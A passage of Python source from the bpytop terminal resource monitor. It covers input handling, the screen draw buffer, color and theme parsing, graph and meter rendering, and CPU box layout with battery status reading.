if list(cls.mouse_pos) in positions:
clean_key = key_name
break
else:
clean_key = "mouse_click"
elif input_key == "\\": clean_key = "\\" #* Clean up "\" to not return escaped
else:
for code in cls.escape.keys(): #* Go trough dict of escape codes to get the cleaned key name
if input_key.lstrip("\033").startswith(code):
clean_key = cls.escape[code]
break
else: #* If not found in escape dict and length of key is 1, assume regular character
if len(input_key) == 1:
clean_key = input_key
if clean_key:
cls.list.append(clean_key) #* Store up to 10 keys in input queue for later processing
if len(cls.list) > 10: del cls.list[0]
clean_key = ""
cls.new.set() #* Set threading event to interrupt main thread sleep
input_key = ""
except Exception as e:
errlog.exception(f'Input thread failed with exception: {e}')
cls.idle.set()
cls.list.clear()
clean_quit(1, thread=True)
class Draw:
'''Holds the draw buffer and manages IO blocking queue
* .buffer([+]name[!], *args, append=False, now=False, z=100) : Add *args to buffer
* - Adding "+" prefix to name sets append to True and appends to name's current string
* - Adding "!" suffix to name sets now to True and print name's current string
* .out(clear=False) : Print all strings in buffer, clear=True clear all buffers after
* .now(*args) : Prints all arguments as a string
* .clear(*names) : Clear named buffers, all if no argument
* .last_screen() : Prints all saved buffers
'''
strings: Dict[str, str] = {}
z_order: Dict[str, int] = {}
saved: Dict[str, str] = {}
save: Dict[str, bool] = {}
once: Dict[str, bool] = {}
idle = threading.Event()
idle.set()
@classmethod
def now(cls, *args):
'''Wait for input reader and self to be idle then print to screen'''
Key.idle.wait()
cls.idle.wait()
cls.idle.clear()
try:
print(*args, sep="", end="", flush=True)
except BlockingIOError:
pass
Key.idle.wait()
print(*args, sep="", end="", flush=True)
cls.idle.set()
@classmethod
def buffer(cls, name: str, *args: str, append: bool = False, now: bool = False, z: int = 100, only_save: bool = False, no_save: bool = False, once: bool = False):
string: str = ""
if name.startswith("+"):
name = name.lstrip("+")
append = True
if name.endswith("!"):
name = name.rstrip("!")
now = True
cls.save[name] = not no_save
cls.once[name] = once
if not name in cls.z_order or z != 100: cls.z_order[name] = z
if args: string = "".join(args)
if only_save:
if name not in cls.saved or not append: cls.saved[name] = ""
cls.saved[name] += string
else:
if name not in cls.strings or not append: cls.strings[name] = ""
cls.strings[name] += string
if now:
cls.out(name)
@classmethod
def out(cls, *names: str, clear = False):
out: str = ""
if not cls.strings: return
if names:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in names and name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = cls.strings[name]
if clear or cls.once[name]:
cls.clear(name)
cls.now(out)
else:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = cls.strings[name]
if cls.once[name] and not clear:
cls.clear(name)
if clear:
cls.clear()
cls.now(out)
@classmethod
def saved_buffer(cls) -> str:
out: str = ""
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in cls.saved:
out += cls.saved[name]
return out
@classmethod
def clear(cls, *names, saved: bool = False):
if names:
for name in names:
if name in cls.strings:
del cls.strings[name]
if name in cls.save:
del cls.save[name]
if name in cls.once:
del cls.once[name]
if saved:
if name in cls.saved:
del cls.saved[name]
if name in cls.z_order:
del cls.z_order[name]
else:
cls.strings = {}
cls.save = {}
cls.once = {}
if saved:
cls.saved = {}
cls.z_order = {}
class Color:
'''Holds representations for a 24-bit color value
__init__(color, depth="fg", default=False)
-- color accepts 6 digit hexadecimal: string "#RRGGBB", 2 digit hexadecimal: string "#FF" or decimal RGB "255 255 255" as a string.
-- depth accepts "fg" or "bg"
__call__(*args) joins str arguments to a string and apply color
__str__ returns escape sequence to set color
__iter__ returns iteration over red, green and blue in integer values of 0-255.
* Values: .hexa: str | .dec: Tuple[int, int, int] | .red: int | .green: int | .blue: int | .depth: str | .escape: str
'''
hexa: str; dec: Tuple[int, int, int]; red: int; green: int; blue: int; depth: str; escape: str; default: bool
def __init__(self, color: str, depth: str = "fg", default: bool = False):
self.depth = depth
self.default = default
try:
if not color:
self.dec = (-1, -1, -1)
self.hexa = ""
self.red = self.green = self.blue = -1
self.escape = "\033[49m" if depth == "bg" and default else ""
return
elif color.startswith("#"):
self.hexa = color
if len(self.hexa) == 3:
self.hexa += self.hexa[1:3] + self.hexa[1:3]
c = int(self.hexa[1:3], base=16)
self.dec = (c, c, c)
elif len(self.hexa) == 7:
self.dec = (int(self.hexa[1:3], base=16), int(self.hexa[3:5], base=16), int(self.hexa[5:7], base=16))
else:
raise ValueError(f'Incorrectly formatted hexadecimal rgb string: {self.hexa}')
else:
c_t = tuple(map(int, color.split(" ")))
if len(c_t) == 3:
self.dec = c_t #type: ignore
else:
raise ValueError(f'RGB dec should be "0-255 0-255 0-255"')
ct = self.dec[0] + self.dec[1] + self.dec[2]
if ct > 255*3 or ct < 0:
raise ValueError(f'RGB values out of range: {color}')
except Exception as e:
errlog.exception(str(e))
self.escape = ""
return
if self.dec and not self.hexa: self.hexa = f'{hex(self.dec[0]).lstrip("0x").zfill(2)}{hex(self.dec[1]).lstrip("0x").zfill(2)}{hex(self.dec[2]).lstrip("0x").zfill(2)}'
if self.dec and self.hexa:
self.red, self.green, self.blue = self.dec
self.escape = f'\033[{38 if self.depth == "fg" else 48};2;{";".join(str(c) for c in self.dec)}m'
if not CONFIG.truecolor or LOW_COLOR:
self.escape = f'{self.truecolor_to_256(rgb=self.dec, depth=self.depth)}'
def __str__(self) -> str:
return self.escape
def __repr__(self) -> str:
return repr(self.escape)
def __iter__(self) -> Iterable:
for c in self.dec: yield c
def __call__(self, *args: str) -> str:
if len(args) < 1: return ""
return f'{self.escape}{"".join(args)}{getattr(Term, self.depth)}'
@staticmethod
def truecolor_to_256(rgb: Tuple[int, int, int], depth: str="fg") -> str:
out: str = ""
pre: str = f'\033[{"38" if depth == "fg" else "48"};5;'
greyscale: Tuple[int, int, int] = ( rgb[0] // 11, rgb[1] // 11, rgb[2] // 11 )
if greyscale[0] == greyscale[1] == greyscale[2]:
out = f'{pre}{232 + greyscale[0]}m'
else:
out = f'{pre}{round(rgb[0] / 51) * 36 + round(rgb[1] / 51) * 6 + round(rgb[2] / 51) + 16}m'
return out
@staticmethod
def escape_color(hexa: str = "", r: int = 0, g: int = 0, b: int = 0, depth: str = "fg") -> str:
"""Returns escape sequence to set color
* accepts either 6 digit hexadecimal hexa="#RRGGBB", 2 digit hexadecimal: hexa="#FF"
* or decimal RGB: r=0-255, g=0-255, b=0-255
* depth="fg" or "bg"
"""
dint: int = 38 if depth == "fg" else 48
color: str = ""
if hexa:
try:
if len(hexa) == 3:
c = int(hexa[1:], base=16)
if CONFIG.truecolor and not LOW_COLOR:
color = f'\033[{dint};2;{c};{c};{c}m'
else:
color = f'{Color.truecolor_to_256(rgb=(c, c, c), depth=depth)}'
elif len(hexa) == 7:
if CONFIG.truecolor and not LOW_COLOR:
color = f'\033[{dint};2;{int(hexa[1:3], base=16)};{int(hexa[3:5], base=16)};{int(hexa[5:7], base=16)}m'
else:
color = f'{Color.truecolor_to_256(rgb=(int(hexa[1:3], base=16), int(hexa[3:5], base=16), int(hexa[5:7], base=16)), depth=depth)}'
except ValueError as e:
errlog.exception(f'{e}')
else:
if CONFIG.truecolor and not LOW_COLOR:
color = f'\033[{dint};2;{r};{g};{b}m'
else:
color = f'{Color.truecolor_to_256(rgb=(r, g, b), depth=depth)}'
return color
@classmethod
def fg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="fg")
else: return cls.escape_color(hexa=args[0], depth="fg")
@classmethod
def bg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="bg")
else: return cls.escape_color(hexa=args[0], depth="bg")
class Colors:
'''Standard colors for menus and dialogs'''
default = Color("#cc")
white = Color("#ff")
red = Color("#bf3636")
green = Color("#68bf36")
blue = Color("#0fd7ff")
yellow = Color("#db8b00")
black_bg = Color("#00", depth="bg")
null = Color("")
class Theme:
'''__init__ accepts a dict containing { "color_element" : "color" }'''
themes: Dict[str, str] = {}
cached: Dict[str, Dict[str, str]] = { "Default" : DEFAULT_THEME }
current: str = ""
main_bg = main_fg = title = hi_fg = selected_bg = selected_fg = inactive_fg = proc_misc = cpu_box = mem_box = net_box = proc_box = div_line = temp_start = temp_mid = temp_end = cpu_start = cpu_mid = cpu_end = free_start = free_mid = free_end = cached_start = cached_mid = cached_end = available_start = available_mid = available_end = used_start = used_mid = used_end = download_start = download_mid = download_end = upload_start = upload_mid = upload_end = graph_text = meter_bg = process_start = process_mid = process_end = Colors.default
gradient: Dict[str, List[str]] = {
"temp" : [],
"cpu" : [],
"free" : [],
"cached" : [],
"available" : [],
"used" : [],
"download" : [],
"upload" : [],
"proc" : [],
"proc_color" : [],
"process" : [],
}
def __init__(self, theme: str):
self.refresh()
self._load_theme(theme)
def __call__(self, theme: str):
for k in self.gradient.keys(): self.gradient[k] = []
self._load_theme(theme)
def _load_theme(self, theme: str):
tdict: Dict[str, str]
if theme in self.cached:
tdict = self.cached[theme]
elif theme in self.themes:
tdict = self._load_file(self.themes[theme])
self.cached[theme] = tdict
else:
errlog.warning(f'No theme named "{theme}" found!')
theme = "Default"
CONFIG.color_theme = theme
tdict = DEFAULT_THEME
self.current = theme
#if CONFIG.color_theme != theme: CONFIG.color_theme = theme
if not "graph_text" in tdict and "inactive_fg" in tdict:
tdict["graph_text"] = tdict["inactive_fg"]
if not "meter_bg" in tdict and "inactive_fg" in tdict:
tdict["meter_bg"] = tdict["inactive_fg"]
if not "process_start" in tdict and "cpu_start" in tdict:
tdict["process_start"] = tdict["cpu_start"]
tdict["process_mid"] = tdict.get("cpu_mid", "")
tdict["process_end"] = tdict.get("cpu_end", "")
#* Get key names from DEFAULT_THEME dict to not leave any color unset if missing from theme dict
for item, value in DEFAULT_THEME.items():
default = item in ["main_fg", "main_bg"]
depth = "bg" if item in ["main_bg", "selected_bg"] else "fg"
if item in tdict:
setattr(self, item, Color(tdict[item], depth=depth, default=default))
else:
setattr(self, item, Color(value, depth=depth, default=default))
#* Create color gradients from one, two or three colors, 101 values indexed 0-100
self.proc_start, self.proc_mid, self.proc_end = self.main_fg, Colors.null, self.inactive_fg
self.proc_color_start, self.proc_color_mid, self.proc_color_end = self.inactive_fg, Colors.null, self.process_start
rgb: Dict[str, Tuple[int, int, int]]
colors: List[List[int]] = []
for name in self.gradient:
rgb = { "start" : getattr(self, f'{name}_start').dec, "mid" : getattr(self, f'{name}_mid').dec, "end" : getattr(self, f'{name}_end').dec }
colors = [ list(getattr(self, f'{name}_start')) ]
if rgb["end"][0] >= 0:
r = 50 if rgb["mid"][0] >= 0 else 100
for first, second in ["start", "mid" if r == 50 else "end"], ["mid", "end"]:
for i in range(r):
colors += [[rgb[first][n] + i * (rgb[second][n] - rgb[first][n]) // r for n in range(3)]]
if r == 100:
break
self.gradient[name] += [ Color.fg(*color) for color in colors ]
else:
c = Color.fg(*rgb["start"])
self.gradient[name] += [c] * 101
#* Set terminal colors
Term.fg = f'{self.main_fg}'
Term.bg = f'{self.main_bg}' if CONFIG.theme_background else "\033[49m"
Draw.now(self.main_fg, self.main_bg)
@classmethod
def refresh(cls):
'''Sets themes dict with names and paths to all found themes'''
cls.themes = { "Default" : "Default" }
try:
for d in (THEME_DIR, USER_THEME_DIR):
if not d: continue
for f in os.listdir(d):
if f.endswith(".theme"):
cls.themes[f'{"" if d == THEME_DIR else "+"}{f[:-6]}'] = f'{d}/{f}'
except Exception as e:
errlog.exception(str(e))
@staticmethod
def _load_file(path: str) -> Dict[str, str]:
'''Load a bashtop formatted theme file and return a dict'''
new_theme: Dict[str, str] = {}
try:
with open(path, "r") as f:
for line in f:
if not line.startswith("theme["): continue
key = line[6:line.find("]")]
s = line.find('"')
value = line[s + 1:line.find('"', s + 1)]
new_theme[key] = value
except Exception as e:
errlog.exception(str(e))
return new_theme
class Banner:
'''Holds the bpytop banner, .draw(line, [col=0], [center=False], [now=False])'''
out: List[str] = []
c_color: str = ""
length: int = 0
if not out:
for num, (color, color2, line) in enumerate(BANNER_SRC):
if len(line) > length: length = len(line)
out_var = ""
line_color = Color.fg(color)
line_color2 = Color.fg(color2)
line_dark = Color.fg(f'#{80 - num * 6}')
for n, letter in enumerate(line):
if letter == "█" and c_color != line_color:
if 5 < n < 25: c_color = line_color2
else: c_color = line_color
out_var += c_color
elif letter == " ":
letter = f'{Mv.r(1)}'
c_color = ""
elif letter != "█" and c_color != line_dark:
c_color = line_dark
out_var += line_dark
out_var += letter
out.append(out_var)
@classmethod
def draw(cls, line: int, col: int = 0, center: bool = False, now: bool = False):
out: str = ""
if center: col = Term.width // 2 - cls.length // 2
for n, o in enumerate(cls.out):
out += f'{Mv.to(line + n, col)}{o}'
out += f'{Term.fg}'
if now: Draw.out(out)
else: return out
class Symbol:
h_line: str = "─"
v_line: str = "│"
left_up: str = "┌"
right_up: str = "┐"
left_down: str = "└"
right_down: str = "┘"
title_left: str = "┤"
title_right: str = "├"
div_up: str = "┬"
div_down: str = "┴"
graph_up: Dict[float, str] = {
0.0 : " ", 0.1 : "⢀", 0.2 : "⢠", 0.3 : "⢰", 0.4 : "⢸",
1.0 : "⡀", 1.1 : "⣀", 1.2 : "⣠", 1.3 : "⣰", 1.4 : "⣸",
2.0 : "⡄", 2.1 : "⣄", 2.2 : "⣤", 2.3 : "⣴", 2.4 : "⣼",
3.0 : "⡆", 3.1 : "⣆", 3.2 : "⣦", 3.3 : "⣶", 3.4 : "⣾",
4.0 : "⡇", 4.1 : "⣇", 4.2 : "⣧", 4.3 : "⣷", 4.4 : "⣿"
}
graph_up_small = graph_up.copy()
graph_up_small[0.0] = "\033[1C"
graph_down: Dict[float, str] = {
0.0 : " ", 0.1 : "⠈", 0.2 : "⠘", 0.3 : "⠸", 0.4 : "⢸",
1.0 : "⠁", 1.1 : "⠉", 1.2 : "⠙", 1.3 : "⠹", 1.4 : "⢹",
2.0 : "⠃", 2.1 : "⠋", 2.2 : "⠛", 2.3 : "⠻", 2.4 : "⢻",
3.0 : "⠇", 3.1 : "⠏", 3.2 : "⠟", 3.3 : "⠿", 3.4 : "⢿",
4.0 : "⡇", 4.1 : "⡏", 4.2 : "⡟", 4.3 : "⡿", 4.4 : "⣿"
}
graph_down_small = graph_down.copy()
graph_down_small[0.0] = "\033[1C"
meter: str = "■"
up: str = "↑"
down: str = "↓"
left: str = "←"
right: str = "→"
enter: str = "↲"
ok: str = f'{Color.fg("#30ff50")}√{Color.fg("#cc")}'
fail: str = f'{Color.fg("#ff3050")}!{Color.fg("#cc")}'
class Graph:
'''Class for creating and adding to graphs
* __str__ : returns graph as a string
* add(value: int) : adds a value to graph and returns it as a string
* __call__ : same as add
'''
out: str
width: int
height: int
graphs: Dict[bool, List[str]]
colors: List[str]
invert: bool
max_value: int
color_max_value: int
offset: int
no_zero: bool
round_up_low: bool
current: bool
last: int
lowest: int = 0
symbol: Dict[float, str]
def __init__(self, width: int, height: int, color: Union[List[str], Color, None], data: List[int], invert: bool = False, max_value: int = 0, offset: int = 0, color_max_value: Union[int, None] = None, no_zero: bool = False, round_up_low: bool = False):
self.graphs: Dict[bool, List[str]] = {False : [], True : []}
self.current: bool = True
self.width = width
self.height = height
self.invert = invert
self.offset = offset
self.round_up_low = round_up_low
self.no_zero = no_zero or round_up_low
if not data: data = [0]
if max_value:
self.lowest = 1 if self.round_up_low else 0
self.max_value = max_value
data = [ min_max((v + offset) * 100 // (max_value + offset), min_max(v + offset, 0, self.lowest), 100) for v in data ] #* Convert values to percentage values of max_value with max_value as ceiling
else:
self.max_value = 0
if color_max_value:
self.color_max_value = color_max_value
else:
self.color_max_value = self.max_value
if self.color_max_value and self.max_value:
color_scale = int(100.0 * self.max_value / self.color_max_value)
else:
color_scale = 100
self.colors: List[str] = []
if isinstance(color, list) and height > 1:
for i in range(1, height + 1): self.colors.insert(0, color[min(100, i * color_scale // height)]) #* Calculate colors of graph
if invert: self.colors.reverse()
elif isinstance(color, Color) and height > 1:
self.colors = [ f'{color}' for _ in range(height) ]
else:
if isinstance(color, list): self.colors = color
elif isinstance(color, Color): self.colors = [ f'{color}' for _ in range(101) ]
if self.height == 1:
self.symbol = Symbol.graph_down_small if invert else Symbol.graph_up_small
else:
self.symbol = Symbol.graph_down if invert else Symbol.graph_up
value_width: int = ceil(len(data) / 2)
filler: str = ""
if value_width > width: #* If the size of given data set is bigger then width of graph, shrink data set
data = data[-(width*2):]
value_width = ceil(len(data) / 2)
elif value_width < width: #* If the size of given data set is smaller then width of graph, fill graph with whitespace
filler = self.symbol[0.0] * (width - value_width)
if len(data) % 2: data.insert(0, 0)
for _ in range(height):
for b in [True, False]:
self.graphs[b].append(filler)
self._create(data, new=True)
def _create(self, data: List[int], new: bool = False):
h_high: int
h_low: int
value: Dict[str, int] = { "left" : 0, "right" : 0 }
val: int
side: str
#* Create the graph
for h in range(self.height):
h_high = round(100 * (self.height - h) / self.height) if self.height > 1 else 100
h_low = round(100 * (self.height - (h + 1)) / self.height) if self.height > 1 else 0
for v in range(len(data)):
if new: self.current = bool(v % 2) #* Switch between True and False graphs
if new and v == 0: self.last = 0
for val, side in [self.last, "left"], [data[v], "right"]: # type: ignore
if val >= h_high:
value[side] = 4
elif val <= h_low:
value[side] = 0
else:
if self.height == 1: value[side] = round(val * 4 / 100 + 0.5)
else: value[side] = round((val - h_low) * 4 / (h_high - h_low) + 0.1)
if self.no_zero and not (new and v == 0 and side == "left") and h == self.height - 1 and value[side] < 1 and not (self.round_up_low and val == 0): value[side] = 1
if new: self.last = data[v]
self.graphs[self.current][h] += self.symbol[float(value["left"] + value["right"] / 10)]
if data: self.last = data[-1]
self.out = ""
if self.height == 1:
self.out += f'{"" if not self.colors else (THEME.inactive_fg if self.last < 5 else self.colors[self.last])}{self.graphs[self.current][0]}'
elif self.height > 1:
for h in range(self.height):
if h > 0: self.out += f'{Mv.d(1)}{Mv.l(self.width)}'
self.out += f'{"" if not self.colors else self.colors[h]}{self.graphs[self.current][h if not self.invert else (self.height - 1) - h]}'
if self.colors: self.out += f'{Term.fg}'
def __call__(self, value: Union[int, None] = None) -> str:
if not isinstance(value, int): return self.out
self.current = not self.current
if self.height == 1:
if self.graphs[self.current][0].startswith(self.symbol[0.0]):
self.graphs[self.current][0] = self.graphs[self.current][0].replace(self.symbol[0.0], "", 1)
else:
self.graphs[self.current][0] = self.graphs[self.current][0][1:]
else:
for n in range(self.height):
self.graphs[self.current][n] = self.graphs[self.current][n][1:]
if self.max_value: value = min_max((value + self.offset) * 100 // (self.max_value + self.offset), min_max(value + self.offset, 0, self.lowest), 100)
self._create([value])
return self.out
def add(self, value: Union[int, None] = None) -> str:
return self.__call__(value)
def __str__(self):
return self.out
def __repr__(self):
return repr(self.out)
class Graphs:
'''Holds all graphs and lists of graphs for dynamically created graphs'''
cpu: Dict[str, Graph] = {}
cores: List[Graph] = [NotImplemented] * THREADS
temps: List[Graph] = [NotImplemented] * (THREADS + 1)
net: Dict[str, Graph] = {}
detailed_cpu: Graph = NotImplemented
detailed_mem: Graph = NotImplemented
pid_cpu: Dict[int, Graph] = {}
disk_io: Dict[str, Dict[str, Graph]] = {}
class Meter:
'''Creates a percentage meter
__init__(value, width, theme, gradient_name) to create new meter
__call__(value) to set value and return meter as a string
__str__ returns last set meter as a string
'''
out: str
color_gradient: List[str]
color_inactive: Color
gradient_name: str
width: int
invert: bool
saved: Dict[int, str]
def __init__(self, value: int, width: int, gradient_name: str, invert: bool = False):
self.gradient_name = gradient_name
self.color_gradient = THEME.gradient[gradient_name]
self.color_inactive = THEME.meter_bg
self.width = width
self.saved = {}
self.invert = invert
self.out = self._create(value)
def __call__(self, value: Union[int, None]) -> str:
if not isinstance(value, int): return self.out
if value > 100: value = 100
elif value < 0: value = 100
if value in self.saved:
self.out = self.saved[value]
else:
self.out = self._create(value)
return self.out
def __str__(self) -> str:
return self.out
def __repr__(self):
return repr(self.out)
def _create(self, value: int) -> str:
if value > 100: value = 100
elif value < 0: value = 100
out: str = ""
for i in range(1, self.width + 1):
if value >= round(i * 100 / self.width):
out += f'{self.color_gradient[round(i * 100 / self.width) if not self.invert else round(100 - (i * 100 / self.width))]}{Symbol.meter}'
else:
out += self.color_inactive(Symbol.meter * (self.width + 1 - i))
break
else:
out += f'{Term.fg}'
if not value in self.saved:
self.saved[value] = out
return out
class Meters:
cpu: Meter
battery: Meter
mem: Dict[str, Union[Meter, Graph]] = {}
swap: Dict[str, Union[Meter, Graph]] = {}
disks_used: Dict[str, Meter] = {}
disks_free: Dict[str, Meter] = {}
class Box:
'''Box class with all needed attributes for create_box() function'''
name: str
num: int = 0
boxes: List = []
view_modes: Dict[str, List] = {"full" : ["cpu", "mem", "net", "proc"], "stat" : ["cpu", "mem", "net"], "proc" : ["cpu", "proc"]}
view_mode: str
for view_mode in view_modes:
if sorted(CONFIG.shown_boxes.split(), key=str.lower) == view_modes[view_mode]:
break
else:
view_mode = "user"
view_modes["user"] = CONFIG.shown_boxes.split()
height_p: int
width_p: int
x: int
y: int
width: int
height: int
out: str
bg: str
_b_cpu_h: int
_b_mem_h: int
redraw_all: bool
buffers: List[str] = []
clock_on: bool = False
clock: str = ""
clock_len: int = 0
resized: bool = False
clock_custom_format: Dict[str, Any] = {
"/host" : os.uname()[1],
"/user" : os.environ.get("USER") or pwd.getpwuid(os.getuid())[0],
"/uptime" : "",
}
if clock_custom_format["/host"].endswith(".local"):
clock_custom_format["/host"] = clock_custom_format["/host"].replace(".local", "")
@classmethod
def calc_sizes(cls):
'''Calculate sizes of boxes'''
cls.boxes = CONFIG.shown_boxes.split()
for sub in cls.__subclasses__():
sub._calc_size() # type: ignore
sub.resized = True # type: ignore
@classmethod
def draw_update_ms(cls, now: bool = True):
if not "cpu" in cls.boxes: return
update_string: str = f'{CONFIG.update_ms}ms'
xpos: int = CpuBox.x + CpuBox.width - len(update_string) - 15
if not "+" in Key.mouse:
Key.mouse["+"] = [[xpos + 7 + i, CpuBox.y] for i in range(3)]
Key.mouse["-"] = [[CpuBox.x + CpuBox.width - 4 + i, CpuBox.y] for i in range(3)]
Draw.buffer("update_ms!" if now and not Menu.active else "update_ms",
f'{Mv.to(CpuBox.y, xpos)}{THEME.cpu_box(Symbol.h_line * 7, Symbol.title_left)}{Fx.b}{THEME.hi_fg("+")} ',
f'{THEME.title(update_string)} {THEME.hi_fg("-")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}', only_save=Menu.active, once=True)
if now and not Menu.active:
Draw.clear("update_ms")
if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
Draw.out("battery")
@classmethod
def draw_clock(cls, force: bool = False):
if not "cpu" in cls.boxes or not cls.clock_on: return
out: str = ""
if force: pass
elif Term.resized or strftime(CONFIG.draw_clock) == cls.clock: return
clock_string = cls.clock = strftime(CONFIG.draw_clock)
for custom in cls.clock_custom_format:
if custom in clock_string:
if custom == "/uptime": cls.clock_custom_format["/uptime"] = CpuCollector.uptime
clock_string = clock_string.replace(custom, cls.clock_custom_format[custom])
clock_len = len(clock_string[:(CpuBox.width-56)])
if cls.clock_len != clock_len and not CpuBox.resized:
out = f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(cls.clock_len//2))}{Fx.ub}{THEME.cpu_box}{Symbol.h_line * cls.clock_len}'
cls.clock_len = clock_len
now: bool = False if Menu.active else not force
out += (f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(clock_len//2))}{Fx.ub}{THEME.cpu_box}'
f'{Symbol.title_left}{Fx.b}{THEME.title(clock_string[:clock_len])}{Fx.ub}{THEME.cpu_box}{Symbol.title_right}{Term.fg}')
Draw.buffer("clock", out, z=1, now=now, once=not force, only_save=Menu.active)
if now and not Menu.active:
if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
Draw.out("battery")
@classmethod
def empty_bg(cls) -> str:
return (f'{Term.clear}' +
(f'{Banner.draw(Term.height // 2 - 10, center=True)}'
f'{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}[esc] Menu'
f'{Mv.r(25)}{Fx.i}Version: {VERSION}{Fx.ui}' if Term.height > 22 else "") +
f'{Mv.d(1)}{Mv.l(34)}{Fx.b}All boxes hidden!'
f'{Mv.d(1)}{Mv.l(17)}{Fx.b}[1] {Fx.ub}Toggle CPU box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[2] {Fx.ub}Toggle MEM box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[3] {Fx.ub}Toggle NET box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[4] {Fx.ub}Toggle PROC box'
f'{Mv.d(1)}{Mv.l(19)}{Fx.b}[m] {Fx.ub}Cycle presets'
f'{Mv.d(1)}{Mv.l(17)}{Fx.b}[q] Quit {Fx.ub}{Term.bg}{Term.fg}')
@classmethod
def draw_bg(cls, now: bool = True):
'''Draw all boxes outlines and titles'''
out: str = ""
if not cls.boxes:
out = cls.empty_bg()
else:
out = "".join(sub._draw_bg() for sub in cls.__subclasses__()) # type: ignore
Draw.buffer("bg", out, now=now, z=1000, only_save=Menu.active, once=True)
cls.draw_update_ms(now=now)
if CONFIG.draw_clock: cls.draw_clock(force=True)
class SubBox:
box_x: int = 0
box_y: int = 0
box_width: int = 0
box_height: int = 0
box_columns: int = 0
column_size: int = 0
class CpuBox(Box, SubBox):
name = "cpu"
num = 1
x = 1
y = 1
height_p = 32
width_p = 100
min_w: int = 60
min_h: int = 8
resized: bool = True
redraw: bool = False
buffer: str = "cpu"
battery_percent: int = 1000
battery_secs: int = 0
battery_status: str = "Unknown"
old_battery_pos = 0
old_battery_len = 0
battery_path: Union[str, None] = ""
battery_clear: bool = False
battery_symbols: Dict[str, str] = {"Charging": "▲",
"Discharging": "▼",
"Full": "■",
"Not charging": "■"}
clock_block: bool = True
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "cpu" in cls.boxes:
Box._b_cpu_h = 0
cls.width = Term.width
return
cpu = CpuCollector
height_p: int
if cls.boxes == ["cpu"]:
height_p = 100
else:
height_p = cls.height_p
cls.width = round(Term.width * cls.width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height < 8: cls.height = 8
Box._b_cpu_h = cls.height
#THREADS = 64
cls.box_columns = ceil((THREADS + 1) / (cls.height - 5))
if cls.box_columns * (20 + 13 if cpu.got_sensors else 21) < cls.width - (cls.width // 3):
cls.column_size = 2
cls.box_width = (20 + 13 if cpu.got_sensors else 21) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (15 + 6 if cpu.got_sensors else 15) < cls.width - (cls.width // 3):
cls.column_size = 1
cls.box_width = (15 + 6 if cpu.got_sensors else 15) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (8 + 6 if cpu.got_sensors else 8) < cls.width - (cls.width // 3):
cls.column_size = 0
else:
cls.box_columns = (cls.width - cls.width // 3) // (8 + 6 if cpu.got_sensors else 8); cls.column_size = 0
if cls.column_size == 0: cls.box_width = (8 + 6 if cpu.got_sensors else 8) * cls.box_columns + 1
cls.box_height = ceil(THREADS / cls.box_columns) + 4
if cls.box_height > cls.height - 2: cls.box_height = cls.height - 2
cls.box_x = (cls.width - 1) - cls.box_width
cls.box_y = cls.y + ceil((cls.height - 2) / 2) - ceil(cls.box_height / 2) + 1
@classmethod
def _draw_bg(cls) -> str:
if not "cpu" in cls.boxes: return ""
if not "M" in Key.mouse:
Key.mouse["M"] = [[cls.x + 10 + i, cls.y] for i in range(6)]
return (f'{create_box(box=cls, line_color=THEME.cpu_box)}'
f'{Mv.to(cls.y, cls.x + 10)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("M")}{THEME.title("enu")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
f'{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title=CPU_NAME[:cls.box_width - 14] if not CONFIG.custom_cpu_name else CONFIG.custom_cpu_name[:cls.box_width - 14])}')
@classmethod
def battery_activity(cls) -> bool:
if not hasattr(psutil, "sensors_battery") or psutil.sensors_battery() == None:
if cls.battery_percent != 1000:
cls.battery_clear = True
return False
if cls.battery_path == "":
cls.battery_path = None
if os.path.isdir("/sys/class/power_supply"):
for directory in sorted(os.listdir("/sys/class/power_supply")):
if directory.startswith('BAT') or 'battery' in directory.lower():
cls.battery_path = f'/sys/class/power_supply/{directory}/'
break
return_true: bool = False
percent: int = ceil(getattr(psutil.sensors_battery(), "percent", 0))
if percent != cls.battery_percent:
cls.battery_percent = percent
return_true = True
seconds: int = getattr(psutil.sensors_battery(), "secsleft", 0)
if seconds != cls.battery_secs:
cls.battery_secs = seconds
return_true = True
status: str = "not_set"
if cls.battery_path:
status = readfile(cls.battery_path + "status", default="not_set")
if status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == True:
status = "Charging" if cls.battery_percent < 100 else "Full"
elif status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == False:
status = "Discharging"
elif status == "not_set":
status = "Unknown"
if status != cls.battery_status:
cls.battery_status = status
return_true = True
return return_true or cls.resized or cls.redraw or Menu.active
@classmethod
def _draw_fg(cls):
if not "cpu" in cls.boxes: return
cpu = CpuCollector
if cpu.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
lavg: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
hh: int = ceil(h / 2)
hh2: int = h - hh
mid_line: bool = False
temp: int = 0
unit: str = ""
